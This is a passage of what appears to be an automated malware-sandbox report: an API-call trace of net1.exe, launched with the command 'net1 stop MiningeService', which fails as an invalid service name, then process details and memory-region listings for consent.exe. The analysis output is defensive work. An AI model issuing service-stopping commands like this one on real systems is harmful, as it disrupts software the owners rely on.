_DstBuf=0x25f944, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0269.926] setlocale (category=0, locale=".437") returned="English_United States.437" [0269.928] GetStdHandle (nStdHandle=0xfffffff5) returned 0x20c [0269.928] GetStdHandle (nStdHandle=0xfffffff4) returned 0x20c [0269.928] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MiningeService" [0269.928] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x25f710, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0269.928] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x66) returned 0x2a3c38 [0269.929] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x25f914 | out: Buffer=0x25f914*=0x2a1c98) returned 0x0 [0269.929] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x25f914 | out: Buffer=0x25f914*=0x2a1cb0) returned 0x0 [0269.929] _fileno (_File=0x76d62900) returned 0 [0269.929] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0269.929] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0269.929] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0269.929] _wcsicmp (_String1="config", _String2="stop") returned -16 [0269.929] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0269.929] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0269.929] _wcsicmp (_String1="file", _String2="stop") returned -13 [0269.929] _wcsicmp (_String1="files", _String2="stop") returned -13 [0269.929] _wcsicmp (_String1="group", _String2="stop") returned -12 [0269.929] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0269.929] _wcsicmp (_String1="help", _String2="stop") returned -11 [0269.929] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0269.929] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0269.929] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0269.930] _wcsicmp (_String1="session", _String2="stop") returned -15 [0269.930] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0269.930] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0269.930] _wcsicmp (_String1="share", _String2="stop") returned -12 [0269.930] _wcsicmp (_String1="start", _String2="stop") returned -14 [0269.930] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0269.930] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0269.930] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0269.930] _wcsicmp (_String1="accounts", _String2="MiningeService") returned -12 [0269.930] _wcsicmp (_String1="computer", _String2="MiningeService") returned -10 [0269.930] _wcsicmp (_String1="config", _String2="MiningeService") returned -10 [0269.930] _wcsicmp (_String1="continue", _String2="MiningeService") returned -10 [0269.930] _wcsicmp (_String1="cont", _String2="MiningeService") returned -10 [0269.930] _wcsicmp (_String1="file", _String2="MiningeService") returned -7 [0269.930] _wcsicmp (_String1="files", _String2="MiningeService") returned -7 [0269.930] _wcsicmp (_String1="group", _String2="MiningeService") returned -6 [0269.930] _wcsicmp (_String1="groups", _String2="MiningeService") returned -6 [0269.930] _wcsicmp (_String1="help", _String2="MiningeService") returned -5 [0269.930] _wcsicmp (_String1="helpmsg", _String2="MiningeService") returned -5 [0269.930] _wcsicmp (_String1="localgroup", _String2="MiningeService") returned -1 [0269.930] _wcsicmp (_String1="pause", _String2="MiningeService") returned 3 [0269.930] _wcsicmp (_String1="session", _String2="MiningeService") returned 6 [0269.930] _wcsicmp (_String1="sessions", _String2="MiningeService") returned 6 [0269.930] _wcsicmp (_String1="sess", _String2="MiningeService") returned 6 [0269.930] _wcsicmp (_String1="share", _String2="MiningeService") returned 6 [0269.930] _wcsicmp (_String1="start", _String2="MiningeService") returned 6 [0269.931] _wcsicmp (_String1="stats", _String2="MiningeService") returned 6 [0269.931] _wcsicmp (_String1="statistics", _String2="MiningeService") returned 6 [0269.931] _wcsicmp (_String1="stop", _String2="MiningeService") returned 6 [0269.931] _wcsicmp (_String1="time", _String2="MiningeService") returned 7 [0269.931] _wcsicmp (_String1="user", _String2="MiningeService") returned 8 [0269.931] _wcsicmp (_String1="users", _String2="MiningeService") returned 8 [0269.931] _wcsicmp (_String1="msg", _String2="MiningeService") returned 10 [0269.931] _wcsicmp (_String1="messenger", _String2="MiningeService") returned -4 [0269.931] _wcsicmp (_String1="receiver", _String2="MiningeService") returned 5 [0269.931] _wcsicmp (_String1="rcv", _String2="MiningeService") returned 5 [0269.931] _wcsicmp (_String1="netpopup", _String2="MiningeService") returned 1 [0269.931] _wcsicmp (_String1="redirector", _String2="MiningeService") returned 5 [0269.931] _wcsicmp (_String1="redir", _String2="MiningeService") returned 5 [0269.931] _wcsicmp (_String1="rdr", _String2="MiningeService") returned 5 [0269.931] _wcsicmp (_String1="workstation", _String2="MiningeService") returned 10 [0269.931] _wcsicmp (_String1="work", _String2="MiningeService") returned 10 [0269.931] _wcsicmp (_String1="wksta", _String2="MiningeService") returned 10 [0269.931] _wcsicmp (_String1="prdr", _String2="MiningeService") returned 3 [0269.931] _wcsicmp (_String1="devrdr", _String2="MiningeService") returned -9 [0269.931] _wcsicmp (_String1="lanmanworkstation", _String2="MiningeService") returned -1 [0269.931] _wcsicmp (_String1="server", _String2="MiningeService") returned 6 [0269.931] _wcsicmp (_String1="svr", _String2="MiningeService") returned 6 [0269.931] _wcsicmp (_String1="srv", _String2="MiningeService") returned 6 [0269.931] _wcsicmp (_String1="lanmanserver", _String2="MiningeService") returned -1 [0269.931] _wcsicmp (_String1="alerter", _String2="MiningeService") returned -12 [0269.932] _wcsicmp (_String1="netlogon", _String2="MiningeService") returned 1 [0269.932] _wcsupr (in: _String="MiningeService" | out: _String="MININGESERVICE") returned="MININGESERVICE" [0269.933] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2a5540 [0269.938] GetServiceKeyNameW (in: hSCManager=0x2a5540, lpDisplayName="MININGESERVICE", lpServiceName=0x5caaf0, lpcchBuffer=0x25f8b0 | out: lpServiceName="", lpcchBuffer=0x25f8b0) returned 0 [0269.941] _wcsicmp (_String1="msg", _String2="MININGESERVICE") returned 10 [0269.941] _wcsicmp (_String1="messenger", _String2="MININGESERVICE") returned -4 [0269.941] _wcsicmp (_String1="receiver", _String2="MININGESERVICE") returned 5 [0269.941] _wcsicmp (_String1="rcv", _String2="MININGESERVICE") returned 5 [0269.941] _wcsicmp (_String1="redirector", _String2="MININGESERVICE") returned 5 [0269.941] _wcsicmp (_String1="redir", _String2="MININGESERVICE") returned 5 [0269.941] _wcsicmp (_String1="rdr", _String2="MININGESERVICE") returned 5 [0269.941] _wcsicmp (_String1="workstation", _String2="MININGESERVICE") returned 10 [0269.941] _wcsicmp (_String1="work", _String2="MININGESERVICE") returned 10 [0269.941] _wcsicmp (_String1="wksta", _String2="MININGESERVICE") returned 10 [0269.941] _wcsicmp (_String1="prdr", _String2="MININGESERVICE") returned 3 [0269.942] _wcsicmp (_String1="devrdr", _String2="MININGESERVICE") returned -9 [0269.942] _wcsicmp (_String1="lanmanworkstation", _String2="MININGESERVICE") returned -1 [0269.942] _wcsicmp (_String1="server", _String2="MININGESERVICE") returned 6 [0269.942] _wcsicmp (_String1="svr", _String2="MININGESERVICE") returned 6 [0269.942] _wcsicmp (_String1="srv", _String2="MININGESERVICE") returned 6 [0269.942] _wcsicmp (_String1="lanmanserver", _String2="MININGESERVICE") returned -1 [0269.942] _wcsicmp (_String1="alerter", _String2="MININGESERVICE") returned -12 [0269.942] _wcsicmp (_String1="netlogon", _String2="MININGESERVICE") returned 1 [0269.943] NetServiceControl (in: servername=0x0, service="MININGESERVICE", opcode=0x0, arg=0x0, bufptr=0x25f8ac | out: bufptr=0x25f8ac) returned 0x889 [0269.944] wcscpy_s (in: _Destination=0x5ca4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0269.944] LoadLibraryW (lpLibFileName="NETMSG") returned 0x72c80000 [0269.949] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72c80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x5cb338, nSize=0x800, Arguments=0x5c9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0270.168] GetFileType (hFile=0x20c) returned 0x3 [0270.168] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2a40d0 [0270.168] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2a40d0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0270.168] WriteFile (in: hFile=0x20c, lpBuffer=0x2a40d0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x25f7ec, lpOverlapped=0x0 | out: lpBuffer=0x2a40d0*, lpNumberOfBytesWritten=0x25f7ec*=0x1e, lpOverlapped=0x0) returned 1 [0270.169] LocalFree (hMem=0x2a40d0) returned 0x0 [0270.169] GetFileType (hFile=0x20c) returned 0x3 [0270.169] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2a5fe8 [0270.169] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2a5fe8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n*", lpUsedDefaultChar=0x0) returned 2 [0270.169] WriteFile (in: hFile=0x20c, lpBuffer=0x2a5fe8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25f7ec, lpOverlapped=0x0 | out: lpBuffer=0x2a5fe8*, lpNumberOfBytesWritten=0x25f7ec*=0x2, lpOverlapped=0x0) returned 1 [0270.169] LocalFree (hMem=0x2a5fe8) returned 0x0 [0270.169] _ultow (in: _Dest=0x889, _Radix=2488348 | out: _Dest=0x889) returned="2185" [0270.169] FormatMessageW (in: dwFlags=0x2800, lpSource=0x72c80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x5cb338, nSize=0x800, Arguments=0x5c9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0270.280] GetFileType (hFile=0x20c) returned 0x3 [0270.281] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2a62a8 [0270.281] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2a62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n.", lpUsedDefaultChar=0x0) returned 52 [0270.281] WriteFile (in: hFile=0x20c, lpBuffer=0x2a62a8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x25f7f8, lpOverlapped=0x0 | out: lpBuffer=0x2a62a8*, lpNumberOfBytesWritten=0x25f7f8*=0x34, lpOverlapped=0x0) returned 1 [0270.281] LocalFree (hMem=0x2a62a8) returned 0x0 [0270.281] GetFileType (hFile=0x20c) returned 0x3 [0270.281] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2a5fe8 [0270.281] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2a5fe8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n*", lpUsedDefaultChar=0x0) returned 2 [0270.281] WriteFile (in: hFile=0x20c, lpBuffer=0x2a5fe8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25f7f8, lpOverlapped=0x0 | out: lpBuffer=0x2a5fe8*, lpNumberOfBytesWritten=0x25f7f8*=0x2, lpOverlapped=0x0) returned 1 [0270.281] LocalFree (hMem=0x2a5fe8) returned 0x0 [0270.286] NetApiBufferFree (Buffer=0x2a1c98) returned 0x0 [0270.286] NetApiBufferFree (Buffer=0x2a1cb0) returned 0x0 [0270.286] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MiningeService" [0270.286] exit (_Code=2) Process: id = "23" image_name = "consent.exe" filename = "c:\\windows\\system32\\consent.exe" page_root = "0x657ee000" os_pid = "0x8d8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x360" cmd_line = "consent.exe 864 310 0000000003309500" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5578 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5579 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5580 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5581 start_va = 0x1b0000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 5582 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5583 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5584 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5585 start_va = 0xffcf0000 end_va = 0xffd0dfff monitored = 0 entry_point = 0xffcfa1d0 region_type = mapped_file name = "consent.exe" filename = "\\Windows\\System32\\consent.exe" (normalized: "c:\\windows\\system32\\consent.exe") Region: id = 5586 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5587 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5588 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 5589 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5590 start_va = 0x310000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 5591 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5592 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5593 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5594 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5595 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5596 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5597 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5598 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5599 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5600 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5601 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5602 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5619 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5620 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5621 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5622 start_va = 0x7fef9900000 end_va = 0x7fef9906fff monitored = 0 entry_point = 0x7fef9901010 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 5623 start_va = 0x7fefd520000 end_va = 0x7fefd527fff monitored = 0 entry_point = 0x7fefd522a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 5624 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5625 start_va = 0x7fef8660000 end_va = 0x7fef869afff monitored = 0 entry_point = 0x7fef86622f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 5626 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 5627 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5628 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5629 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 5630 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 5631 start_va = 0x7fef81c0000 end_va = 0x7fef81cafff monitored = 0 entry_point = 0x7fef81c1290 region_type = mapped_file name = "msctfmonitor.dll" filename = "\\Windows\\System32\\MsCtfMonitor.dll" (normalized: "c:\\windows\\system32\\msctfmonitor.dll") Region: id = 5632 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5633 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5634 start_va = 0x7fef8180000 end_va = 0x7fef81bcfff monitored = 0 entry_point = 0x7fef8181bdc region_type = mapped_file name = "msutb.dll" filename = "\\Windows\\System32\\msutb.dll" (normalized: "c:\\windows\\system32\\msutb.dll") Region: id = 5635 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 5636 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5637 start_va = 0x410000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 5638 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 5639 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 5649 start_va = 0x590000 end_va = 0x717fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 5650 start_va = 0x720000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 5651 start_va = 0x8b0000 end_va = 0x1caffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 5652 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "consent.exe.mui" filename = "\\Windows\\System32\\en-US\\consent.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\consent.exe.mui") Region: id = 5653 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 5654 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 5655 start_va = 0xe0000 end_va = 0xe0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 5656 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 5657 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 5658 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5659 start_va = 0x290000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 5660 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 5661 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5664 start_va = 0x100000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 5665 start_va = 0x130000 end_va = 0x1acfff monitored = 0 entry_point = 0x13cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5666 start_va = 0x130000 end_va = 0x1acfff monitored = 0 entry_point = 0x13cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5667 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5668 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 5669 start_va = 0x1cb0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 5670 start_va = 0x1cb0000 end_va = 0x1d8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cb0000" filename = "" Region: id = 5671 start_va = 0x1e60000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 5677 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 5678 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5679 start_va = 0x130000 end_va = 0x174fff monitored = 0 entry_point = 0x131064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5680 start_va = 0x130000 end_va = 0x174fff monitored = 0 entry_point = 0x131064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5681 start_va = 0x130000 end_va = 0x174fff monitored = 0 entry_point = 0x131064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5682 start_va = 0x130000 end_va = 